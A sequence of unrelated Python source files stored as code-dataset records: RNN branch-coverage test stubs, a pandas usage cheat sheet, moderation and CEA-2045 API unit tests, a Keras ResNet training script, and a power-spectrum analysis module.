mini_batch:\n tree = RNN.trees[t]\n # perform calculations\n RNN.calc_outputs(tree)\n RNN.calc_errors(tree, delta_w, delta_ws)\n train_cost += RNN.get_cost(tree)\n\n # scale and regularize the parameters\n scale = 1. / len(mini_batch)\n RNN.scale_regularize(delta_w, delta_ws, scale)\n RNN.update(delta_w, delta_ws)\n\n # Reset the derivatives\n delta_w.fill(0)\n delta_ws.fill(0)\n\n if is_val:\n # check performance on validation set for early stopping\n pred_cost = RNN.validate()\n if pred_cost < (1 - error_factor) * min_cost:\n min_cost = pred_cost\n count_down = max_count\n w_best = RNN.w.copy()\n ws_best = RNN.ws.copy()\n else:\n count_down -= 1\n\n # performance on validation set has not decreased significantly in the past\n if count_down == 0:\n RNN.w = w_best\n RNN.ws = ws_best\n break\n\n return train_cost\n\n def Stub2_train(self, RNN, is_val=False):\n \"\"\"\n For isVal=False\n \"\"\"\n # error derivatives with respect to parameters\n delta_w = np.zeros(RNN.w.shape)\n delta_ws = np.zeros(RNN.ws.shape)\n train_cost = 0\n\n # early stopping parameters\n min_cost = np.inf\n max_count = 30\n count_down = max_count\n error_factor = 0.0001\n train_size = len(RNN.tree_train)\n\n # best set of parameters\n w_best = None\n ws_best = None\n\n RNN.epochs = 1\n\n for i in xrange(RNN.epochs):\n # Shuffle training set and create mini batches\n np.random.shuffle(RNN.tree_train)\n mini_batches = [RNN.tree_train[i:min(i + RNN.mini_batch, train_size)]\n for i in xrange(0, train_size, RNN.mini_batch)]\n # run SGD for each mini batch\n mini_batches = [[123]]\n for mini_batch in mini_batches:\n train_cost = 0\n for t in mini_batch:\n tree = RNN.trees[t]\n # perform calculations\n RNN.calc_outputs(tree)\n RNN.calc_errors(tree, delta_w, delta_ws)\n train_cost += RNN.get_cost(tree)\n\n # scale and regularize the parameters\n scale = 1. 
/ len(mini_batch)\n RNN.scale_regularize(delta_w, delta_ws, scale)\n RNN.update(delta_w, delta_ws)\n\n # Reset the derivatives\n delta_w.fill(0)\n delta_ws.fill(0)\n\n if is_val:\n # check performance on validation set for early stopping\n pred_cost = RNN.validate()\n if pred_cost < (1 - error_factor) * min_cost:\n min_cost = pred_cost\n count_down = max_count\n w_best = RNN.w.copy()\n ws_best = RNN.ws.copy()\n else:\n count_down -= 1\n\n # performance on validation set has not decreased significantly in the past\n if count_down == 0:\n RNN.w = w_best\n RNN.ws = ws_best\n break\n\n return train_cost\n\n def Stub3_train(self, RNN, is_val=True):\n \"\"\"\n For isVal=True,pred_cost condition False and count_down==0\n \"\"\"\n # error derivatives with respect to parameters\n delta_w = np.zeros(RNN.w.shape)\n delta_ws = np.zeros(RNN.ws.shape)\n train_cost = 0\n\n # early stopping parameters\n min_cost = np.inf\n max_count = 30\n count_down = max_count\n error_factor = 0.0001\n train_size = len(RNN.tree_train)\n\n # best set of parameters\n w_best = None\n ws_best = None\n\n RNN.epochs = 1\n\n for i in xrange(RNN.epochs):\n # Shuffle training set and create mini batches\n np.random.shuffle(RNN.tree_train)\n mini_batches = [RNN.tree_train[i:min(i + RNN.mini_batch, train_size)]\n for i in xrange(0, train_size, RNN.mini_batch)]\n # run SGD for each mini batch\n mini_batches = [[123]]\n for mini_batch in mini_batches:\n train_cost = 0\n for t in mini_batch:\n tree = RNN.trees[t]\n # perform calculations\n RNN.calc_outputs(tree)\n RNN.calc_errors(tree, delta_w, delta_ws)\n train_cost += RNN.get_cost(tree)\n\n # scale and regularize the parameters\n scale = 1. / len(mini_batch)\n RNN.scale_regularize(delta_w, delta_ws, scale)\n RNN.update(delta_w, delta_ws)\n\n # Reset the derivatives\n delta_w.fill(0)\n delta_ws.fill(0)\n\n if is_val:\n # check performance on validation set for early stopping\n pred_cost = RNN.validate()\n pred_cost = (1 - error_factor) * min_cost - 1\n\n if pred_cost < (1 - error_factor) * min_cost:\n min_cost = pred_cost\n count_down = max_count\n w_best = RNN.w.copy()\n ws_best = RNN.ws.copy()\n else:\n count_down -= 1\n\n # performance on validation set has not decreased significantly in the past\n count_down = 0\n if count_down == 0:\n RNN.w = w_best\n RNN.ws = ws_best\n break\n\n return train_cost\n\n\nclass TestModel(TestCase):\n RNN = None\n R = None\n\n def setUp(self):\n TestModel.R = RNNBranchCoverage()\n training_size = 10\n\n train = np.ceil(0.6 * training_size)\n val = np.ceil(0.15 * training_size)\n\n with open('rnn.pickle_test', 'rb') as pickle_file:\n TestModel.RNN = pickle.load(pickle_file)\n\n indices = np.arange(0, training_size)\n np.random.shuffle(TestModel.RNN.trees)\n np.random.shuffle(indices)\n TestModel.RNN.tree_train = indices[:train]\n TestModel.RNN.tree_val = indices[train:train + val]\n TestModel.RNN.tree_test = indices[train + val:]\n TestModel.RNN.train(True)\n\n def test_Stub_validate(self):\n exp = 0.080\n actual = TestModel.R.Stub_validate(TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub_check_model_veracity(self):\n exp = 0.08999999999999999\n actual = TestModel.R.Stub_validate(TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub_test(self):\n exp = 1.\n actual = TestModel.R.Stub_test(TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub_cross_validate(self):\n exp = 0.\n actual = TestModel.R.Stub_cross_validate(TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def 
test_Stub1_forward(self):\n exp = np.array([[-0.1006483 ],[-0.29548601],[ 0.0063629 ],[-0.17319958],[ 0.12327064],[ 0.02946587],[ 0.00644705],[-0.47383259],[-0.17706092],[ 0.14228462],[ 0.67255053],[-0.03523792],[ 0.2564717 ],[-0.18084416],[-0.3138467 ],[ 0.10138548],[-0.22682543],[ 0.11797612],[ 0.29268094],[ 0.17062235],[-0.19280561],[-0.31326626],[-0.05769646],[-0.31976983],[-0.1723143 ],[ 0.33203993],[-0.13410669],[ 0.04226759],[-0.27281455],[ 0.1945153 ],[-0.15207751],[ 0.32342922],[ 0.36387432],[ 0.10829055],[ 0.26577119],[ 0.08183803],[ 0.05923863],[-0.4977896 ],[-0.36396976],[-0.58843395],[ 0.51139022],[ 0.20288105],[-0.81887659],[ 0.21982588],[ 0.45401075],[-0.33887771],[-0.02298285],[-0.35496048],[-0.53704188], [0.27011948]])\n actual = TestModel.R.Stub1_forward(TestModel.RNN.trees[0].root, TestModel.RNN)\n assert np.allclose(exp, actual)\n # self.assertAlmostEquals(exp, actual)\n\n def test_Stub2_forward(self):\n exp = None\n actual = TestModel.R.Stub2_forward(TestModel.RNN.trees[0].root, TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub1_back_prop(self):\n exp = None\n actual = TestModel.R.Stub1_back_prop(TestModel.RNN, TestModel.RNN.trees[0].root, 0, 0, 0)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub2_back_prop(self):\n exp = None\n actual = TestModel.R.Stub2_back_prop(TestModel.RNN, TestModel.RNN.trees[0].root, 0, 0, 0)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub_numerical_gradient(self):\n exp = np.array([[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.]])\n actual = TestModel.R.Stub_numerical_gradient(TestModel.RNN, TestModel.RNN.trees[0])\n actual = actual[:18, :]\n assert np.allclose(exp, actual)\n\n def test_Stub1_train(self):\n exp = 0.089999999999999\n actual = TestModel.R.Stub1_train(TestModel.RNN, True)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub2_train(self):\n exp = 0.11\n actual = TestModel.R.Stub2_train(TestModel.RNN, False)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub3_train(self):\n exp = 0.13\n actual = TestModel.R.Stub3_train(TestModel.RNN, True)\n self.assertAlmostEqual(exp, actual)","sub_path":"RNNBranchCoverage_omer.py","file_name":"RNNBranchCoverage_omer.py","file_ext":"py","file_size_in_byte":18193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"378459531","text":"\nimport pandas as pa\nimport pandas as pd\nimport numpy as np\n\n\n\npa.set_option('max_rows', 9)\npa.set_option('expand_frame_repr', False)\n\n\n\n# Input data\ndf = pd.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'], 'C': [1, 2, 3]})\ndf = pa.Series(list('abcaa'))\ndf = pd.DataFrame([[1,2], [3,4]], columns=['a', 'b'])\n\nraw = pa.read_csv(r\"C:\\VS Projects\\Numerics\\Numerics\\Temp.FSharp\\Data\\Movies\\Movies_2m.csv\", encoding = \"ISO-8859-1\")\n\n# Use parse-dates\nraw = pa.read_csv(r\"D:\\FastStats\\PUBLISH\\BMK\\project\\All Transactions.csv\", parse_dates=['TransDate'], dayfirst=True)\n# since to_datetime is unreliable with UK/US dates\n# df['TransDate2'] = pa.to_datetime(df['TransDate'])\n\n\n# create a sample of OPs unique values\nseries = pd.Series(np.random.randint(low=0, high=3, size=100))\nmapper = {0: 'New York', 1: 'London', 2: 'Zurich'}\nnomvar = series.replace(mapper)\n\npa.get_dummies(df, prefix='col')\n\n\n# Creating\na = pd.concat({'x': x, 'y': y, 'val': val}, axis=1) # From series\n \n\n\n\n\n# Summary of data frame\ndf.info\ndf.head()\ndf.sample(10)\ndf.describe()\n\n\n\n\n\n\n\n\n\n# 
Summary Stats of SERIES\nraw['waiting_time'].value_counts()\nraw[\"Destination\"].unique()\n\n\n\n# Aggregations\ngroup='Product'\ndf.groupby(group).groups.keys()\n\ndf.groupby(group).count() # Creates dataframe\ndf.groupby(['Year', 'Product']).count() # Creates dataframe with hierarchical index\ndf.groupby(group)['Cost'].mean() # Creates series\n\ndf.groupby(['Year']).agg({'Cost':[min, max, 'mean'], 'Product':'count'}) # Creates df\n\n# The columns have a multi-level index that you can collapse with\ndiffs.columns = [\"_\".join(x) for x in diffs.columns.ravel()]\n\n\npiv = pa.pivot_table(df, values=\"Cost\",index=[\"Year\"], columns=[\"Product\"], fill_value=0)\npiv = pa.pivot_table(raw, values=\"Cost\",index=[\"Year\"], columns=[\"Destination\"], fill_value=0)\n\n# Use dropna to ensure all R & C present\ncellMeans = pa.pivot_table(df, index=[byVar,\"Y\"], columns=[\"X\"], values=ofVar, aggfunc=np.mean, fill_value=0, dropna=False)\n\n\n\n\n\n\n\n# Plots\nplt.hist(df.Cost, bins=5, facecolor='red', alpha=0.5, label=\"Cost\")\nplt.legend()\nplt.show()\n\n\nagg = df.groupby('Year')['Cost'].mean()\nagg.plot.bar()\nplt.show()\n\n\n\npiv = pa.pivot_table(df, values=\"Cost\",index=[\"Year\"], columns=[\"Product\"], fill_value=0)\nsns.heatmap(piv)\nplt.show()\n\n\npiv2 = pa.pivot_table(df, values=\"Cost\",index=[\"Year\"], columns=[\"Destination\"], fill_value=0)\nsns.heatmap(piv2)\nplt.show()\n\n\n\n\n\n\n\n\n# Columns\nraw.drop(['PatientId', 'AppointmentID'], axis=1, inplace=True)\n\n\nraw = raw.rename(columns={'Gender': 'sex', 'ScheduledDay': 'scheduled_day', 'AppointmentDay': 'appointment_day', \n 'Age': 'age', 'Neighbourhood': 'neighbourhood', 'Scholarship': 'scholarship', \n 'Hipertension': 'hypertension', 'Diabetes': 'diabetic', 'Alcoholism': 'alcoholic', \n 'Handcap': 'handicap', 'No-show': 'show_up'})\n\ndests = raw.filter(['Person URN', 'Destination'])\n\n\n\n\n\n# Data Types\nraw = raw.select_dtypes(['int64']).apply(pd.Series.astype, dtype='category')\n\n\nraw['Income'] = raw['Income'].astype('category')\nraw['Occupation'] = raw['Occupation'].astype('category')\nraw['age'] = raw['age'].astype('int64')\nraw.info()\n\n\n\n\n\n\n# Values\nraw['sex'] = raw['sex'].map({'F': 0, 'M': 1})\nraw['show_up'] = raw['show_up'].map({'No': 1, 'Yes': 0})\nraw['scheduled_day'] = pd.to_datetime(raw['scheduled_day'], infer_datetime_format=True)\nraw['appointment_day'] = pd.to_datetime(raw['appointment_day'], infer_datetime_format=True)\nraw['waiting_time'] = list(map(lambda x: x.days, raw['appointment_day'] - raw['scheduled_day']))\nraw['waiting_time'] = raw['waiting_time'].apply(lambda x: 1 if(x > 1) else 0)\nraw['appointment_dayofweek'] = raw['appointment_day'].map(lambda x: x.dayofweek)\n\n\n\n\n\n# Rows\nraw.drop(raw[raw['waiting_time'] < -1].index, inplace=True)\ndf = raw.head(20)\n\n\n\n\n\n# Indexing rows (the condition returns the index values for the main df)\ndests = raw.loc[raw[\"Destination\"]==\"Italy\"]\ndests = raw.loc[raw[\"Destination\"].isin([\"Italy\", \"France\"])]\n\ndf.loc[(df['column_name'] == some_value) & df['other_column'].isin(some_values)]\ndf.loc[df['column_name'] != some_value]\ndf.loc[~df['column_name'].isin(some_values)]\n\n\n# Dataframe uses mask, which sets non selected rows to Nan\ndf.where(df[\"A\"]=='a')\ndf.where(df[\"A\"]=='a').dropna() # Hide these rows\n\n# df indexing applies mask and drops Nan\ndf[df[\"A\"]=='a']\ndf[(df[\"A\"]=='a') & (df[\"B\"]=='b')]\ndf[df[\"A\"]=='a' & df[\"B\"]=='b'] # Type cast error without brackets\n\n# df.loc is equivalent to 
mask\ndf.loc[df[\"A\"]=='a']\ndf.loc[[True,False,True], 'C'] # Can also specify column\n\n# Update values with given row and column\ndf.loc[[True,False,True], 'C'] = 9\n\n\n\n\n\n\n# Filter rows (pass bool array of which rows you want)\nraw = pa.read_csv(r\"C:\\VS Projects\\Numerics\\Numerics\\Temp.FSharp\\Data\\Movies\\Movies_200k.csv\")\ndef inGenre(df, genre):\n dGenres = df[\"Genre\"]\n getGenre = lambda multi : multi.split(\"|\")\n isGenre = lambda gList : genre in gList\n bGenres = dGenres.apply(getGenre).apply(isGenre)\n return df[bGenres.values]\n\ninGenre(raw, \"Western\")\n\n\n\n# Dedup rows\nwanted = inGenre(topVol, \"Western\")[[\"Title\", \"Genre\"]].drop_duplicates()\n\n\n\n\n\n# GroupBy (is slow)\nurns = dests.groupby('Person URN')\n\ni=10\nfor urn,gp in urns:\n if i>0:\n print (urn)\n print (gp[\"Destination\"])\n i=i-1\n\n\n\n\n# Convert to ndarray\ndf = pd.DataFrame([[1,2], [3,4],[5,6]], columns=['a', 'b'])\na=df.iloc[:,1:]\nb=df.iloc[:,1:].values\n\nprint(type(df))\nprint(type(a))\nprint(type(b))\n\nc = df.as_matrix()\nprint(type(c))\nprint(c)\nprint(c.shape)\n\n\n\n\n\n\n# Joining on Columns\nmovieEmb = embeddingsToDf(movieMod, \"Title\")\nshowMovies = inGenre(topVol, \"Western\")\npa.merge(movieEmb, showMovies, how='inner', on='Title')\n\n\n# Joining on Index\nmovieEmb = embeddingsToDf(movieMod, \"Title\").set_index(\"Title\")\nshowMovies = inGenre(topVol, \"Western\").set_index(\"Title\")\npa.merge(movieEmb, showMovies, how='inner', left_index=True, right_index=True)\n\n\n\n\n\n\n\n\n\n\n\n######################################################################################\n# SERIES\n######################################################################################\n\n\n# Series: filtering\nraw = pa.read_csv(r\"C:\\VS Projects\\Numerics\\Numerics\\Temp.FSharp\\Data\\Movies\\Movies_200k.csv\")\n\n# value_counts() returns a series\n# where returns full length series but with NaN for the value\n# dropna removes the rows with NaN, ie that fail the where\nraw[\"Title\"].value_counts().where(lambda x: x==601).dropna()\n\n# Dont seem to be able to have multiple conditions in the lambda\n# - so define m, and use in the where to index the series\nm = topVol[\"Member ID\"].value_counts()\nm.where(m>10).where(m<50).dropna()\n\n\n\n\nraw[\"Rating\"].value_counts().sort_values()\nraw[\"Rating\"].value_counts().sort_index()\n\n# Filter the dataframe\nraw[raw[\"Rating\"] >= 4.0]\n\n\n\n\n\n# Banding a series\nr=pa.cut(df[row], bins=rBins, labels=rLabels)\nc=pa.cut(df[col], bins=cBins, labels=cLabels)\npiv = pa.crosstab(r,c)\n\n\n\n\n\n\n# Apply function to each value of series\ndef inGenre(genre):\n dGenres = raw[\"Genre\"]\n getGenre = lambda ar : ar.split(\"|\")\n sGenres = dGenres.apply(getGenre)\n return sGenres\n\nlist(inGenre(\"Action\")[0:10])\n\n\n\n\n\n# Set same flag to all memeber records, based on one title's rating\ndef FlagRatingsOver(df, title, over=3.0):\n ixUnder = (df[\"Rating\"] < over)\n ixOver = (df[\"Rating\"] >= over)\n ixTitle = (df[\"Title\"] == title)\n col = \"Like_\" + title\n df.loc[ixTitle & ixUnder, col] = 0\n df.loc[ixTitle & ixOver, col] = 1\n tData = df[[\"Member ID\", col]].dropna().drop_duplicates()\n flag=pa.merge(df[[\"Member ID\"]], tData, on=\"Member ID\", how='inner')\n df[col] = flag\n print(df[col].value_counts())\n\n\n\n\n# Combine Series\ns1 = pd.Series([1, 2], index=['A', 'B'], name='s1')\ns2 = pd.Series([3, 4], index=['A', 'B'], name='s2')\npd.concat([s1, s2], axis=1)\npd.concat([s1, s2], axis=1).reset_index()\n\n\n\n# Vectorising 
and Filtering\ndef compareDistribution(xSeries, catSeries, ignoreValue = None):\n xmin = np.nanmin(xSeries)\n xmax = np.nanmax(xSeries)\n bins = np.linspace(xmin,xmax, 10)\n keep = lambda x: x != ignoreValue\n keepV = np.vectorize(keep)\n\n def get_x(cat):\n catIx = catSeries[catSeries==cat].dropna().index\n xs = xSeries[catIx].dropna()\n xs[keepV(xs)]\n\n def plot_cat(cat):\n x = get_x(cat)\n plt.hist(x, bins, alpha=0.5, label=str(cat), normed=True)\n\n cats = list(catSeries.drop_duplicates().values)\n\n for cat in cats:\n plot_cat(cat)\n\n plt.legend(loc='upper right')\n plt.show()\n","sub_path":"Samples/Pandas examples.py","file_name":"Pandas examples.py","file_ext":"py","file_size_in_byte":8603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"632255077","text":"from StringIO import StringIO\n\nimport sys\n\nimport unittest\n\nimport moderation\n\nfrom moderation.tests.utils.testsettingsmanager import get_only_settings_locals\n\n\nclass UtilsTestCase(unittest.TestCase):\n \n def test_get_only_settings_locals(self):\n MYSETTING_LOCAL1 = 'test'\n MYSETTING_LOCAL2 = 'test'\n self.assertEqual(get_only_settings_locals(locals()),\n dict(MYSETTING_LOCAL1='test',\n MYSETTING_LOCAL2='test'))\n \n \nclass PEP8TestCase(unittest.TestCase):\n \n def test_pep8_rules(self): \n import pep8 \n sys.argv[1:] = ['--filename=*.py', '--show-source', '--show-pep8',\n '--ignore=W291', moderation.__path__[0]] \n buf = StringIO() \n sys.stdout = buf\n pep8._main() \n sys.stdout = sys.__stdout__ \n result = buf.getvalue()\n\n self.assertEqual(\"\", result,\n \"Code messages should be empty but was:\\n\" + result)\n","sub_path":"src/moderation/tests/unit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"88920502","text":"\n\nimport unittest\nimport CEA_2045\n\ncea = CEA_2045.CEA2045_API(\"Fake\",0)\n#cea = CEA_2045.CEA2045_API(\"/dev/cu.usbserial-A603Y394\",19200)\ncea.initialize(1)\n\nclass CEA2045TestCase(unittest.TestCase):\n\n def test_normal(self):\n '''Test normal run'''\n return_query = {}\n cea.send_msg('normal')\n cea.recv_msg()\n cea.recv_msg()\n cea.send_msg('link_ack')\n cea.send_msg('query')\n cea.recv_msg()\n return_query = cea.recv_msg()\n cea.send_msg('link_ack')\n self.assertEqual(CEA_2045.switch_query_response(return_query['opcode2']), \"Running Normal\")\n\n def test_emergency(self):\n '''Test emergency command'''\n return_query = {}\n cea.send_msg('emergency')\n cea.recv_msg()\n cea.recv_msg()\n cea.send_msg('link_ack')\n cea.send_msg('query')\n cea.recv_msg()\n return_query = cea.recv_msg()\n cea.send_msg('link_ack')\n self.assertEqual(CEA_2045.switch_query_response(return_query['opcode2']), \"Idle Grid\")\n\n def test_shed(self):\n '''Test shed command'''\n return_query = {}\n cea.send_msg('shed')\n cea.recv_msg()\n cea.recv_msg()\n cea.send_msg('link_ack')\n cea.send_msg('query')\n cea.recv_msg()\n return_query = cea.recv_msg()\n cea.send_msg('link_ack')\n self.assertEqual(CEA_2045.switch_query_response(return_query['opcode2']), \"Running Curtailed Grid\")\n","sub_path":"applications/nrel/agents/CEA2045RelayAgent/cea2045relay/API_test.py","file_name":"API_test.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"108901322","text":"import resnet\nfrom keras.callbacks import 
ReduceLROnPlateau,EarlyStopping,CSVLogger,TensorBoard\nimport numpy as np\nimport data\nfrom keras.utils import np_utils\nfrom cfg import config\n\n\n\nlr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1),cooldown=0,patience=5,min_lr=0.5e-6)\nearly_stopper = EarlyStopping(min_delta=0.001,patience=10)\ncsv_logger = CSVLogger(config.csvlogger_path)\nlogging = TensorBoard(config.logs_path)\n\n\n\nx_train,y_train,x_val,y_val = data.load_data(config.train_path,radio=config.radio)\nx_train,y_train,x_val,y_val = data.normalize(x_train,y_train,x_val,y_val)\n\n\n\nmodel = resnet.ResnetBuilder.build_resnet_50((config.img_channels,config.img_rows,config.img_cols),config.nb_classes)\nmodel.compile(loss='categorical_crossentropy',\n optimizer = 'adam',\n metrics = ['accuracy']\n )\n\nif not config.data_augmentation:\n print('Not using data augmentation.')\n model.fit(x_train,y_train,\n batch_size=config.batch_size,\n nb_epoch=config.nb_epoch,\n validation_data=(x_val,y_val),\n shuffle=True,\n callbacks=[lr_reducer,early_stopper,csv_logger,logging]\n )\n\nelse:\n print('Using real-time data augmentation.')\n # This will do preprocessing and realtime data augmentation:\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n # Compute quantities required for featurewise normalization\n # (std, mean, and principal components if ZCA whitening is applied).\n datagen.fit(X_train)\n\n # Fit the model on the batches generated by datagen.flow().\n model.fit_generator(datagen.flow(X_train, Y_train, batch_size=config.batch_size),\n steps_per_epoch=X_train.shape[0] // config.batch_size,\n validation_data=(X_test, Y_test),\n epochs=config.nb_epoch, verbose=1, max_q_size=100,\n callbacks=[lr_reducer, early_stopper, csv_logger,logging])\n\n\n\nmodel.save_weights(config.model_path)\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"535253388","text":"\"\"\"\nComputing and plot powerspectra and spectrograms.\n\nnext_power_of_two(): rounds an integer up to the next power of two.\nnfff_overlap(): computes nfft and overlap based on a requested minimum frequency resolution\n and overlap fraction.\n \npsd(): Compute power spectrum with a given frequency resolution.\ndecibel(): Transforms power to decibel.\nplot_decibel_psd(): Plot power spectrum in decibel.\nmulti_resolution_psd(): Performs the steps to calculate a powerspectrum.\nspectrogram(): Spectrogram of a given frequency resolution and overlap fraction.\n\"\"\"\n\nimport numpy as np\nimport scipy.signal as scps\n\ntry:\n import matplotlib.mlab as mlab\nexcept ImportError:\n pass\n\n\ndef next_power_of_two(n):\n \"\"\"The next integer power of two for an arbitray number.\n \n :param n: (int or float) a positive number\n :return: (int) the next integer power of two\n \"\"\"\n return int(2 ** 
np.floor(np.log(n) / np.log(2.0) + 1.0-1e-8))\n\n\ndef nfft_noverlap(freq_resolution, samplerate, overlap_frac, min_nfft=16):\n \"\"\"The required number of points for an FFT to achieve a minimum frequency resolution\n and the number of overlapping data points.\n\n :param freq_resolution: (float) the minimum required frequency resolution in Hertz.\n :param samplerate: (float) the sampling rate of the data in Hertz.\n :param overlap_frac: (float) the fraction the FFT windows should overlap.\n :param min_nfft: (int) the smallest value of nfft to be used.\n :return nfft: (int) the number of FFT points.\n :return noverlap: (int) the number of overlapping FFT points.\n \"\"\"\n nfft = next_power_of_two(samplerate / freq_resolution)\n if nfft < min_nfft:\n nfft = min_nfft\n noverlap = int(nfft * overlap_frac)\n return nfft, noverlap\n\n\ndef psd(data, samplerate, fresolution, min_nfft=16, detrend=mlab.detrend_none,\n window=mlab.window_hanning, overlap_frac=0.5, pad_to=None,\n sides='default', scale_by_freq=None):\n \"\"\"Power spectrum density of a given frequency resolution.\n\n From the requested frequency resolution and the samplerate nfft is computed.\n \n :param data: (1-D array) data array you want to calculate a psd of.\n :param samplerate: (float) sampling rate of the data in Hertz.\n :param fresolution: (float) frequency resolution of the psd in Hertz.\n :param overlap_frac: (float) fraction of overlap for the fft windows.\n See numpy.psd for the remaining parameter.\n\n :return: (2-D array) power and frequency.\n \"\"\"\n\n nfft, noverlap = nfft_noverlap(fresolution, samplerate, overlap_frac, min_nfft=min_nfft)\n power, freqs = mlab.psd(data, NFFT=nfft, noverlap=noverlap, Fs=samplerate, detrend=detrend, window=window,\n pad_to=pad_to, sides=sides, scale_by_freq=scale_by_freq)\n return np.asarray([np.squeeze(power), freqs]) # squeeze is necessary when nfft is to large with respect to the data\n\n\ndef decibel(power, ref_power=1.0, min_power=1e-20):\n \"\"\"\n Transforms power to decibel relative to ref_power.\n\n decibel_psd = 10 * log10(power/ref_power)\n\n Parameters\n ----------\n power: array\n the power values of the power spectrum or spectrogram.\n ref_power: float\n the reference power for computing decibel. If set to None the maximum power is used.\n min_power: float\n power values smaller than min_power are set to np.nan.\n\n Returns\n -------\n decibel_psd: array\n the power values in decibel\n \"\"\"\n if ref_power is None:\n ref_power = np.max(power)\n decibel_psd = power.copy()\n decibel_psd[power < min_power] = np.nan\n decibel_psd[power >= min_power] = 10.0 * np.log10(decibel_psd[power >= min_power]/ref_power)\n return decibel_psd\n\n\ndef plot_decibel_psd(ax, freqs, power, ref_power=1.0, min_power=1e-20, max_freq=2000.0, **kwargs):\n \"\"\"\n Plot the powerspectum in decibel relative to ref_power.\n\n Parameters\n ----------\n ax:\n axis for plot\n freqs: 1-D array\n frequency array of a psd.\n power: 1-D array\n power array of a psd.\n ref_power: float\n the reference power for computing decibel. 
If set to None the maximum power is used.\n    min_power: float\n        power values smaller than min_power are set to np.nan.\n    max_freq: float\n        limits of frequency axis are set to (0, max_freq) if max_freq is greater than zero\n    kwargs:\n        plot parameters that are passed on to the plot() function.\n    \"\"\"\n    \n    decibel_psd = decibel(power, ref_power=ref_power, min_power=min_power)\n    ax.plot(freqs, decibel_psd, **kwargs)\n    ax.set_xlabel('Frequency [Hz]')\n    if max_freq > 0.0:\n        ax.set_xlim(0, max_freq)\n    else:\n        max_freq = freqs[-1]\n    pmin = np.nanmin(decibel_psd[freqs < max_freq])\n    pmin = np.floor(pmin / 10.0) * 10.0\n    pmax = np.nanmax(decibel_psd[freqs < max_freq])\n    pmax = np.ceil(pmax / 10.0) * 10.0\n    ax.set_ylim(pmin, pmax)\n    ax.set_ylabel('Power [dB]')\n\n\ndef multi_resolution_psd(data, samplerate, fresolution=0.5,\n                         detrend=mlab.detrend_none, window=mlab.window_hanning,\n                         overlap=0.5, pad_to=None, sides='default',\n                         scale_by_freq=None, min_nfft=16):\n    \"\"\"Compute powerspectrum with a given frequency resolution.\n\n    Two other functions are called to first calculate the nfft value and second calculate the powerspectrum. The given\n    frequency resolution can be a float or a list/array of floats.\n\n    (for information on further arguments see the matplotlib.mlab.psd documentation)\n    :param data: (1-D array) data array you want to calculate a psd of.\n    :param samplerate: (float) sampling rate of the data in Hertz.\n    :param fresolution: (float or 1-D array) frequency resolutions for one or multiple psds in Hertz.\n    :param overlap: (float) fraction of overlap for the fft windows.\n    :return multi_psd_data: (3-D or 2-D array) if the psd is calculated for one frequency resolution\n    a 2-D array with the single power spectrum is returned (psd_data[power, freq]).\n    If the psd is calculated for multiple frequency resolutions\n    a list of 2-D arrays is returned (psd_data[frequency_resolution][power, freq]).\n    \"\"\"\n    return_list = True\n    if not hasattr(fresolution, '__len__'):\n        return_list = False\n        fresolution = [fresolution]\n\n    multi_psd_data = []\n    for fres in fresolution:\n        psd_data = psd(data, samplerate, fres, min_nfft, detrend, window, overlap, pad_to, sides, scale_by_freq)\n        multi_psd_data.append(psd_data)\n\n    if not return_list:\n        multi_psd_data = multi_psd_data[0]\n\n    return multi_psd_data\n\n\ndef spectrogram(data, samplerate, fresolution=0.5, detrend=mlab.detrend_none, window=mlab.window_hanning,\n                overlap_frac=0.5, pad_to=None, sides='default', scale_by_freq=None, min_nfft=16):\n    \"\"\"\n    Spectrogram of a given frequency resolution.\n\n    :param data: (array) data for the spectrogram.\n    :param samplerate: (float) samplerate of data in Hertz.\n    :param fresolution: (float) frequency resolution for the spectrogram.\n    :param overlap_frac: (float) overlap of the nffts (0 = no overlap; 1 = total overlap).\n    :return spectrum: (2d array) contains for every timestamp the power of the frequencies listed in the array \"freqs\".\n    :return freqs: (array) frequencies of the spectrogram.\n    :return time: (array) time of the nffts.\n    \"\"\"\n\n    nfft, noverlap = nfft_noverlap(fresolution, samplerate, overlap_frac, min_nfft=min_nfft)\n\n    spectrum, freqs, time = mlab.specgram(data, NFFT=nfft, Fs=samplerate, detrend=detrend, window=window,\n                                          noverlap=noverlap, pad_to=pad_to, sides=sides, scale_by_freq=scale_by_freq)\n    return spectrum, freqs, time\n\n\nif __name__ == '__main__':\n    try:\n        import matplotlib.pyplot as plt\n    except ImportError:\n        pass\n\n    print('Computes powerspectrum of a created signal of two wavefish (300 and 450 
